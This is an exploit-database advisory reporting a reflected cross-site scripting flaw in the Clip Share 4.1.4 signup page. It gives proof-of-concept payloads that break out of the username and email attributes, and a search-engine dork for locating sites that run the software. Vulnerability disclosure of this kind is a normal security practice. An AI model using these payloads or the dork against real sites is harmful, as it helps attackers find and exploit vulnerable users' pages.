## https://sploitus.com/exploit?id=PACKETSTORM:173587
====================================================================================================================================
| # Title : Clip Share 4.1.4 XSS Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) |
| # Vendor : http://www.clip-share.com/ |
| # Dork : Powered By ClipShare |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine .
[+] Xss :
This vulnerability affects /ClipShare/signup.
URL encoded POST input username was set to xtqewoxj" onmouseover=prompt(993897) bad="
The input is reflected inside a tag parameter between double quotes.
URL encoded POST input email was set to sample%40email.tst" onmouseover=prompt(901680) bad="
The input is reflected inside a tag parameter between double quotes.
Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |
=======================================================================================================================================